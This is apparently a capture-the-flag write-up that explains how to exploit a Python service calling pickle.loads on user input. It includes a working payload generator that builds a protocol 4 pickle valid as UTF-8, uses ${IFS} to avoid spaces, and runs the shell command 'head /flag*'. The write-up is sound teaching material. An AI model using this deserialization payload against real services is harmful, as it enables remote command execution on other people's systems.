The challenge server runs a Python script called unipickle.py
with the following code:
#!/usr/local/bin/python
import pickle
pickle.loads(input("pickle: ").split()[0].encode())
The Python script performs the following steps:
- Prompt the user to input a string with
pickle:
. - Parse the user input as a Unicode string.
- Split the string by whitespace
- Take the first part
- Encode the string as UTF-8 bytes to get a
bytes()
object. - Call
pickle.loads()
on the resultingbytes()
object.
To solve the challenge, you need to pass a valid Unicode string. This string must then contain something
that pickle.loads()
can work with after the script turns it to a UTF-8 encoded
bytes()
object.
Python pickle protocol versions
I’ve stored a pickled Python object in a file called uname.pickle
. When
you run pickle.loads()
on this file’s contents, Python runs uname
on your system.
Here’s how the contents of the pickle file look like when you print them with xxd
:
00000000: 6370 6f73 6978 0a73 7973 7465 6d0a 2856 cposix.system.(V
00000010: 756e 616d 650a 7452 2e uname.tR.
You can visualize the contents of this Python pickle using
the pickletools
module with python3 -m pickletools
:
python3 -m pickletools uname.pickle
This prints the following:
0: c GLOBAL 'posix system'
14: ( MARK
15: V UNICODE 'uname'
22: t TUPLE (MARK at 14)
23: R REDUCE
24: . STOP
highest protocol among opcodes = 0
Python pickles have different protocol versions. Protocol version 0 is useful for deserialization attacks because its opcodes are printable ASCII. Opcodes and inputs are split with newlines.
Yet, in this challenge the unipickle.py
script only
looks at the first part of the input after calling .split()
on it. That makes
it difficult to work with version 0.
I instead chose to focus on understanding how I can create a protocol version 4 payload that still passes as valid UTF-8.
Smuggling higher values as Unicode characters
The trick is to smuggle version 4 protocol opcodes inside UTF-8 strings. This technique is called Unicode injection and belongs to a larger class of attacks called encoded injection.
You can encode the following byte sequences and generate valid UTF-8 sequences:
0xxx xxxx
110x xxxx 10xx xxxx
1110 xxxx 10xx xxxx 10xx xxxx
1111 0xxx 10xx xxxx 10xx xxxx
As long as all version 4 protocol opcodes and their following bytes match any
of the four possible UTF-8 sequences, unipickle.py
accepts your input.
Note: another method that prevents unipickle.py
from removing parts of your input
is using ${IFS}
as a space replacement for command injections. This is how it
looks like when you replace space characters from head /flag*
with ${IFS}
:
head${IFS}/flag*
Payload generator
Here’s the payload generator:
#!/usr/bin/env python3
import sys
import math
start = b'U\x05posixU\x06systemq\xc2\x93'
end = b'tR.'
padding = "${IFS}"
minimum_padded_length = 33
def make_payload(payload: str) -> bytes:
payload = payload.replace(" ", padding)
length = len(payload)
assert length < 124
missing = minimum_padded_length - length
add_padding_count = int(math.ceil(missing / len(padding)))
payload = payload + (padding * add_padding_count)
return start + f'(U{chr(len(payload))}{payload}'.encode() + end
payload = "head /flag*"
encoded = make_payload(payload).decode()
print(encoded)
Here’s the payload decoded with pickletools
:
0: U SHORT_BINSTRING 'posix'
7: U SHORT_BINSTRING 'system'
15: q BINPUT 194
17: \x93 STACK_GLOBAL
18: ( MARK
19: U SHORT_BINSTRING 'head${IFS}/flag*${IFS}${IFS}${IFS}'
55: t TUPLE (MARK at 18)
56: R REDUCE
57: . STOP
highest protocol among opcodes = 4
This is what you’ll see when you pipe the payload generator’s output into xxd
:
00000000: 5505 706f 7369 7855 0673 7973 7465 6d71 U.posixU.systemq
00000010: c293 2855 2268 6561 6424 7b49 4653 7d2f ..(U"head${IFS}/
00000020: 666c 6167 2a24 7b49 4653 7d24 7b49 4653 flag*${IFS}${IFS
00000030: 7d24 7b49 4653 7d74 522e 0a }${IFS}tR..
This challenge requires you to closely study Python’s pickle implementation and goes way beyond just blindly copying YAML payloads.